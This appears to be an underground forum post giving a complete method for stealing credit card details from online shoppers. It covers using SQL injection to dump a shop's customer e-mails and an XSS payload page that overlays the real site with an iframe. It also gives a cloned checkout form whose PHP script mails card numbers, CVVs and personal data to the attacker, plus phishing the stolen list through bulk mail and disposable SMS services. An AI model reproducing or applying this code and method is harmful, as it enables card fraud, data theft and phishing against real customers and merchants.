This is my method for getting fresh CC info, sent directly to an inbox of your

choosing!

First, you need to find yourself a vulnerable shop. Won't go into too many details
here, this should be pretty drilled into your head by now. You can do this with
Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your
looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.

First, as you may have noticed on most databases containing CC info, it's
encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However,
one thing you can work with is the current and former customer's e-mail addresses.
Go ahead and rip the whole table with the customer information. If you're lucky,
you'll get at least 10,000 e-mail addresses or more.

Next, you need to work with the XSS vulnerability. I've noticed the most common
being POST vulnerability, so I'll go that route, but you can incorporate it with
FORM or whatever.

You can use the following code to make a redirect.html or whatever you wish to name
it. This page will load the vulnerable website immediately, with one exception, a
giant IFRAME over it which of course is going to be another page you make.
PHP Code:
<html>
<head>
<script language=javascript>
function submitPostLink()
:zin:{
document.postlink.submit();
}
</script>
</head>
<body onload="submitPostLink()">
<form action="https://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe
src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com
width=&quot;800&quot;height=&quot;2400&quot; style=&quot;z-index: 0; position:
absolute; top: 0; left: 0; overflow-y: hidden;&quot; frameborder=0
align=center></iframe>">
</form>
</body>
</html>
Go ahead and goto the checkout page for the site you're working with, and save the
page to your hard drive, including all the subdirectory files and images (firefox
does this auto). Now, you need to edit the main file you just saved.

Search for "action=", and change the page following it to your third page you will
make, which will be the PHP mail form that will send your e-mail all the
information someone fills in the form. The code will look something like....
PHP Code:
<?php
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";

$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($userinfo,$subject,$message,$headers);
You'll want to follow this code with some html code that also looks like a copy of
their site but with some text saying something along the lines of "sorry, this
offer is no longer available" or something of the sort. I'll explain why right now.

After putting all this together and uploading it to a host, you'll want to shorten
youre redirect.html URL, you can use bit.ly, or another shortening service. Then,
you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE
CREATIVE), but something along the lines of them being a valuable customer, and
because of that, you're giving them one of your newest products for only 99 cents!
Make sure that on your checkout form, you list the item you choose, so they see it
when they're checking out.

A great service to send bulk mail for FREE, and no trial or anything, that is if
you don't have hacked SMTP to use, is targethero.com

They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for
free. You'll have to confirm your account with a cell phone, but you should just
use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS
sent to you with no registration.

Trust me, if you send enough e-mails to former customers, especially when it's in
the health and supplement niche, if they get an offer for a 99 cent bottle or
something, they're gonna jump all over that!

Anyway, if you have any questions, please feel free to ask, and I apologize if I
was a little vague but I don't have much time right now but wanted to get this up.
Enjoy!!!